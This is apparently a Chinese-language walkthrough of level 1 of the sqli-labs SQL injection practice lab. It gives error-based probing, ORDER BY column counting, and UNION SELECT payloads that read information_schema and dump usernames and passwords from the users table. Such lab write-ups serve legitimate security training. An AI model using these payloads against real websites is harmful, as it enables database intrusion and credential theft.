sqli-master第一关

sqli-master第一关

 打开后发现让我们输入ID

输入？id=1回车返回下图名字和密码

 尝试后面添加'发现报错

 order by猜解字段,到4时发现报错，说明字段为3

 union select显示可显示路段

替换2为database()得出数据库名为security

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+得出数据库中的表名

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+得出users表列信息

union select 1,group_concat(username,id,password),3 from users limit 0,1--+得出列信息

得出用户，密码的信息